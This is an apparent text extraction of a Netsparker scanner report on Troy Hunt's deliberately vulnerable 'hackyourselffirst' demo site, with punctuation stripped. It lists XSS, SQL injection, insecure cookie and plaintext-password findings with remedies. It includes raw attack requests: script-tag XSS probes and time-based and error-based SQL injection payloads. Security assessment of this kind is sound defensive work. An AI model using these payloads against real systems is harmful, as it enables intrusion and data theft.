XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 231609 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2885Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtSupercar Leaderboard - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
13 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make3orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
7 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230647 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtPaganis - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
14 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
